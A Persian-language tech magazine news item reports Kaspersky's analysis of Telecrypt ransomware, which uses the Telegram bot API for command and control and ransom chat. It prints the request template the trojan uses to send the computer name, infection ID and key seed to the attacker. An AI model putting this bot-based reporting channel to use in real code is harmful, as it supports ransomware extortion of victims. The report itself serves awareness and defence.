بیگانه‌ای پرسه می‌زند شماره 187
باج‌افزاری که از تلگرام سوءاستفاده می‌کند
پژوهشگران امنیتی به‌تازگی موفق شده‌اند یک باج‌افزار جدید رمزکننده فایل‌ها را شناسایی کنند. آن‌ها این باج‌افزار را Telecrypt نامیده‌اند. این باج‌افزار جدید از برنامه پیام‌رسان تلگرام برای برقراری ارتباط با مرکز کنترل و فرمان‌دهی خود استفاده می‌کند.

1606683296_1_0.gif

همچنین به قربانیان خود اجازه می‌دهد از طریق تلگرام با مهاجم در ارتباط باشند و پیام‌هایی را برای او ارسال کنند. کارشناسان آزمایشگاه امنیتی کسپرسکی، این بدافزار را که Trojan-Ransom.Win32.Telecrypt نام دارد، شناسایی کرده‌اند. گزارش این شرکت نشان می‌دهد که در حال حاضر، ساکنان روسیه هدف این باج‌افزار هستند. نکته جالب توجه در این باج‌افزار، مکانیزم ارتباطی آن است؛ گروه طراحی این باج‌افزار برای اینکه مجبور نباشند یک سرویس جدید ارتباطی برای خودشان طراحی کنند، از پروتکل ارتباطی تلگرام سوءاستفاده کرده‌اند. این تروجان که به زبان برنامه‌نویسی دلفی نوشته شده است، زمانی‌که اجرا می‌شود، یک کلید رمزنگاری و شناسه آلودگی ایجاد می‌کند. در گام بعد، یک بات تلگرام ایجاد کرده و از طریق توابع واسط برنامه‌نویسی تلگرام به هکر اعلام می‌کند که فرایند آلوده کردن قربانی با موفقیت به پایان رسیده است. در ادامه، تروجان درخواستی را با استفاده از تابع sendMessage ارسال می‌کند. این تابع به بات اجازه می‌دهد پیام‌ها را برای شماره خاصی ارسال کند.

مطلب پیشنهادی

بدعتی جدید در دنیای هکری: آلوده کنید و کلید دریافت کنید

ترکیب نحوی مورد استفاده این تروجان به این شرح است:

api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

تروجان پارامترهای زیر را همراه با درخواست خود ارسال می‌کند:

<chat> – number of the chat with the cybercriminal;
<computer_name> – name of the infected computer;
<infection_id> – infection ID;
<key_seed> – number used as a basis to generate the file encryption key.

در ادامه، شماره تلفن، نام کامپیوتر، شناسه آلودگی و مقدار اولیه متعلق به کلید رمزنگاری را برای هکر ارسال می‌کند. بعد از اینکه موفق شد اطلاعات مربوط به دستگاه آلوده قربانی را به دست آورد، هارددیسک قربانی را پویش کرده و سعی می‌کند فایل‌های خاصی را شناسایی و رمزنگاری کند. گزارش کسپرسکی نشان می‌دهد که در بعضی موارد، باج‌افزار به انتهای تعدادی از فایل‌ها پسوند .Xcri را افزوده است. با وجود این، در بعضی موارد در حالی که فایل‌ها رمزنگاری شده بودند، فرمت فایلی آن‌ها همچنان بدون تغییر باقی مانده بود. زمانی‌که فایل‌ها روی سامانه قربانی رمزنگاری شدند، بدافزار یک فایل اجرایی را از یک سایت وردپرسی آلوده دانلود می‌کند. این ماژول دانلودشده که هکرها آن را آگاهی‌رسان نام‌گذاری کرده‌اند، پیغام دریافت باج را به قربانیان خود نشان می‌دهد. در ادامه، به قربانیان اعلام می‌کند که برای دسترسی مجدد به فایل‌های خود باید 77 دلار به عنوان باج پرداخت کنند. قربانیان می‌توانند باج را از طریق سرویس‌های پرداختی همچون Qiwi یا Yandex.Money برای هکرها ارسال کنند. صفحه‌ای که پیام درخواست باج در آن قرار دارد، مشتمل بر یک بخش متنی است که از طریق آن، قربانیان می‌توانند با مهاجم در ارتباط باشند. این بخش متنی نیز از سرویس‌های تلگرام برای مقاصد خود سوءاستفاده می‌کند.
پژوهشگران امنیتی پس از بررسی محتوای پیغام ظاهرشده و ویژگی‌های دیگری که در این باج‌افزار استفاده شده است، حدس زده‌اند که طراح یا طراحان این باج‌افزار افراد حرفه‌ای و خبره نیستند. نکته دیگر این است که فرایند رمزنگاری که این باج‌افزار از آن استفاده کرده است، چندان پیشرفته و حرفه‌ای نیست. بر همین اساس، پژوهشگران شرکت کسپرسکی در تلاش هستند تا در اولین فرصت کدهای این باج‌افزار را شکسته و آن را رمزگشایی کنند. پژوهشگران کسپرسکی به قربانیان این باج‌افزار پیشنهاد کرده‌اند که باج‌ مربوطه را پرداخت نکنند و با گروه پشتیبانی کسپرسکی تماس بگیرند تا به آن‌ها کمک کنند. آزمایشگاه امنیتی کسپرسکی یکی از اولین شرکت‌های امنیتی است که به NoMoreRansom پیوسته است و همواره تلاش می‌کند ابزارهای رایگانی را به‌منظور رمزگشایی فایل‌هایی که با باج‌افزارهای مختلفی کدگذاری شده‌اند، ارائه کند.

ماهنامه شبکه را از کجا تهیه کنیم؟
ماهنامه شبکه را می‌توانید از کتابخانه‌های عمومی سراسر کشور و نیز از دکه‌های روزنامه‌فروشی تهیه نمائید.

ثبت اشتراک نسخه کاغذی ماهنامه شبکه     
ثبت اشتراک نسخه آنلاین

 

کتاب الکترونیک +Network راهنمای شبکه‌ها

  • برای دانلود تنها کتاب کامل ترجمه فارسی +Network  اینجا  کلیک کنید.

کتاب الکترونیک دوره مقدماتی آموزش پایتون

  • اگر قصد یادگیری برنامه‌نویسی را دارید ولی هیچ پیش‌زمینه‌ای ندارید اینجا کلیک کنید.

ایسوس

نظر شما چیست؟